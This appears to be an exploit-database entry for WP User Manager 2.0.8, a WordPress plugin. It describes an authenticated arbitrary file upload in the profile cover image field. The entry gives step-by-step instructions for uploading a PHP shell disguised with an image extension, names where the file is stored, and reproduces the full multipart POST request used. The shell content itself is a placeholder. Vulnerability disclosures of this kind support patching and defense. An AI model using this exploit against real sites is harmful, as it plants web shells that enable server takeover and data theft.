WordPress WP User Manager plugin version 2.0.8 suffers from a remote shell upload vulnerability.
29162abcafb73313a966a55d39cfff677f411c94013cab4909f5813bb48da06f
# Exploit Title: Wordpress Plugin WP User Manager 2.0.8 - Arbitrary file upload
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 5, 2019
# Vendor Homepage: https://wpusermanager.com
# Software Link : https://wordpress.org/plugins/wp-user-manager/
# Tested Version: 2.0.8
# Tested on: Kali linux, Windows 8.1 / Wordpress 4.9.8
# Note: Free edition is vulnerable, other versions may also be affected.
# PoC:
# 1.- Login to site and go to your profile setting
# 2.- In profile cover image section, you can upload your shell by adding image extensions to end of your shell. (ex: SHELL.php.png)
# 3.- Click on "Update Profile"
# You can see your shell in /wp-content/uploads/wp-user-manager-uploads/[year]/[month]/SHELL.php.png
# PoC header:
POST /wordpress/?page_id=214&updated=success HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/?page_id=214&updated=success
Content-Type: multipart/form-data; boundary=---------------------------1794372498243154061698264842
Content-Length: 2142
Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=root%7C1547649639%7CwJOz9suousR6JF7I0vqY76uoTRfAwA7bE0diqvzfxjP%7C8fbaaff802e0459d5aa4a1f581eb78053d63c4d024ef4d6048eb7c7c952b8ff5; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26post_dfw%3Doff; wp-settings-time-1=1547476851
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_cover"; filename="SHELL.php.jpeg"
Content-Type: image/jpeg
{{"SHELL CONTENT"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_email"
{{"Email"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_firstname"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_lastname"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_nickname"
root
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_displayname"
display_nickname
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_website"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_description"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="wpum_form"
profile
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="step"
0
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="account_update_nonce"
df63baa04c
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/?page_id=214&updated=success
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="submit_account"
Update profile
-----------------------------1794372498243154061698264842--